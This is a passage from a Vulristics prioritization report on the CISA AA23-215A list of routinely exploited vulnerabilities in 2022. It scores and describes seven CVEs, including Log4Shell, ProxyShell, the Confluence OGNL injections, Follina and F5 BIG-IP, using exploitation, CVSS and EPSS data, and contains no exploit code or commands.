Report Name: AA23-215A_top12 reportGenerated: 2023-08-05 13:55:37
Vulristics Vulnerability Scores
- All vulnerabilities: 12
- Urgent: 11
- Critical: 1
- High: 0
- Medium: 0
- Low: 0
Basic Vulnerability Scores
- All vulnerabilities: 12
- Critical: 9
- High: 2
- Medium: 1
- Low: 0
Products
| Product Name | Prevalence | U | C | H | M | L | A | Comment |
|---|
| Apache Log4j2 | 0.9 | 1 | | | | | 1 | Log4j2 is revamped version of Apache Logging framework |
| Microsoft Exchange | 0.8 | 3 | | | | | 3 | Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft |
| Microsoft Windows Support Diagnostic Tool (MSDT) | 0.8 | 1 | | | | | 1 | The Microsoft Support Diagnostic Tool is a legacy service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes |
| BIG-IP | 0.7 | 1 | | | | | 1 | BIG-IP platform is a smart evolution of Application Delivery Controller (ADC) technology; solutions built on this platform are load balancers |
| Confluence Server | 0.7 | 2 | | | | | 2 | Confluence is a web-based corporate wiki |
| FortiOS | 0.5 | 1 | | | | | 1 | FortiOS is Fortinet's operating system used in their hardware, such as the Fortigate firewall and switches |
| VMware Workspace One | 0.5 | 1 | 1 | | | | 2 | VMware Workspace ONE is a management platform that allows IT administrators to centrally control end users' mobile devices and cloud-hosted virtual desktops and applications from the cloud or from an on-premises deployment |
| Zoho ManageEngine ADSelfService Plus | 0.5 | 1 | | | | | 1 | Zoho ManageEngine ADSelfService Plus is an integrated self-service password management and single sign-on solution for Active Directory and cloud apps |
Vulnerability Types
| Vulnerability Type | Criticality | U | C | H | M | L | A |
|---|
| Remote Code Execution | 1.0 | 7 | | | | | 7 |
| Authentication Bypass | 0.95 | 1 | | | | | 1 |
| Security Feature Bypass | 0.9 | 1 | | | | | 1 |
| Elevation of Privilege | 0.5 | 1 | 1 | | | | 2 |
| Path Traversal | 0.4 | 1 | | | | | 1 |
Comments
| Source | U | C | H | M | L | A |
|---|
| Comment | 11 | 1 | | | | 12 |
Vulnerabilities
Urgent (11)
1. 
Remote Code Execution - Apache Log4j2 (CVE-2021-44228) - Urgent [983]
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (CISA object, CISA object, CISA object), AttackerKB, Microsoft websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Expression Language Injection in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Improper Input Validation in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Deserialization of Untrusted Data in Apache Log4J, Log4Shell HTTP Header Injection, Intel Data Center Manager 5.1 Local Privilege Escalation, MobileIron Log4Shell Remote Command Execution) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.9 | 14 | Log4j2 is revamped version of Apache Logging framework |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 10.0. According to Vulners data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97567, EPSS Percentile is 0.99996 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-44228 (Log4Shell) Apache Log4j2 RCE CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data
2. Remote Code Execution - Microsoft Exchange (CVE-2021-34473) - Urgent [954]
Description: Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object, CISA object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Server-Side Request Forgery in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Deserialization of Untrusted Data in Apache Log4J, Exploit for Vulnerability in Microsoft, Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft, Microsoft Exchange ProxyShell Remote Code Execution, Microsoft Exchange ProxyShell RCE, Exchange ProxyOracle 信息泄露漏洞利用链(CVE-2021-31195、 CVE-2021-31196)) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.8 | 14 | Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft |
| CVSS Base Score | 0.9 | 10 | CVSS Base Score is 9.1. According to Microsoft data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97442, EPSS Percentile is 0.99909 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-34473 (Proxy Shell) Microsoft Exchange Server RCE CWE-918 Server-Side Request Forgery (SSRF)
3. Remote Code Execution - Confluence Server (CVE-2021-26084) - Urgent [950]
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (AttackerKB object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence Server, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for Injection in Atlassian Confluence, Exploit for OS Command Injection in Zeroshell, Exploit for Deserialization of Untrusted Data in Apache Log4J, Atlassian Confluence WebWork OGNL Injection Exploit, Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit, Atlassian Confluence Namespace OGNL Injection Exploit, Atlassian Confluence WebWork OGNL Injection, Atlassian Confluence WebWork OGNL Injection, Confluence Server 7.12.4 OGNL Injection Remote Code Execution, Atlassian Confluence Namespace OGNL Injection, Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.7 | 14 | Confluence is a web-based corporate wiki |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97477, EPSS Percentile is 0.99945 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2021-26084 Atlassian Confluence Server and Data Center Arbitrary code execution CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
4. Remote Code Execution - Confluence Server (CVE-2022-26134) - Urgent [950]
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Atlassian Confluence Namespace OGNL Injection, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for CVE-2022-26134, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Exploit for Injection in Atlassian Confluence Data Center, Confluence OGNL Injection Remote Code Execution, Atlassian Confluence Namespace OGNL Injection, Confluence Data Center 7.18.0 - Remote Code Execution Exploit, Confluence OGNL Injection Remote Code Execution Exploit, Atlassian Confluence Namespace OGNL Injection Exploit, Confluence Data Center 7.18.0 - Remote Code Execution (RCE)) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.7 | 14 | Confluence is a web-based corporate wiki |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97537, EPSS Percentile is 0.99985 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-26134 Atlassian Confluence Server and Data Center RCE CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
5. Remote Code Execution - Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-30190) - Urgent [942]
Description: Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB, Microsoft websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Exploit for Vulnerability in Microsoft, Microsoft Office Word MSDTJS, Microsoft Office Word MSDTJS Code Execution, Microsoft Office MSDT Follina Proof Of Concept, Microsoft Office Word MSDTJS Code Execution Exploit) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.8 | 14 | The Microsoft Support Diagnostic Tool is a legacy service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes |
| CVSS Base Score | 0.8 | 10 | CVSS Base Score is 7.8. According to Microsoft data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97319, EPSS Percentile is 0.99801 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-30190. This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-30190 Microsoft Multiple Products RCE None Listed
6. 
Authentication Bypass - BIG-IP (CVE-2022-1388) - Urgent [941]
Description: On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager, F5 BIG-IP iControl RCE via REST Authentication Bypass, F5 BIG-IP iControl Remote Code Execution, F5 BIG-IP Remote Code Execution, F5 BIG-IP 16.0.x Remote Code Execution, F5 BIG-IP iControl REST vulnerability, F5 BIG-IP iControl REST vulnerability, F5 BIG-IP 16.0.x - Remote Code Execution (RCE)) |
| Criticality of Vulnerability Type | 0.95 | 15 | Authentication Bypass |
| Vulnerable Product is Common | 0.7 | 14 | BIG-IP platform is a smart evolution of Application Delivery Controller (ADC) technology; solutions built on this platform are load balancers |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97477, EPSS Percentile is 0.99946 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software.
Comment: Table 1 "Top 12 Routinely Exploited Vulnerabilities in 2022": CVE-2022-1388 F5 Networks BIG-IP Missing Authentication Vulnerability CWE-306 Missing Authentication for Critical Function
7. Remote Code Execution - VMware Workspace One (CVE-2022-22954) - Urgent [916]
Description: VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.
| Component | Value | Weight | Comment |
|---|
| Exploited in the Wild | 1.0 | 18 | Exploitation in the wild is mentioned on Vulners (cisa_kev object), AttackerKB websites |
| Public Exploit Exists | 1.0 | 17 | The existence of a publicly available exploit is mentioned on Vulners website (Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, Exploit for Code Injection in Vmware Identity Manager, VMware Workspace ONE Access Template Injection / Command Execution, SRC-2022-0005 : VMware Workspace ONE Access customError.ftl Server-side Template Injection Remote Code Execution Vulnerability, VMware Workspace ONE Access Template Injection / Command Execution Exploit, VMware Workspace ONE Access CVE-2022-22954) |
| Criticality of Vulnerability Type | 1.0 | 15 | Remote Code Execution |
| Vulnerable Product is Common | 0.5 | 14 | VMware Workspace ONE is a management platform that allows IT administrators to centrally control end users' mobile devices and cloud-hosted virtual desktops and applications from the cloud or from an on-premises deployment |
| CVSS Base Score | 1.0 | 10 | CVSS Base Score is 9.8. According to Vulners data source |
| EPSS Percentile | 1.0 | 10 | EPSS Probability is 0.97532, EPSS Percentile is 0.99981 |
Comment: Top 12 Routinely Exploited Vulnerabilities: • CVE-2022-22954, CVE-2022-22960. These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
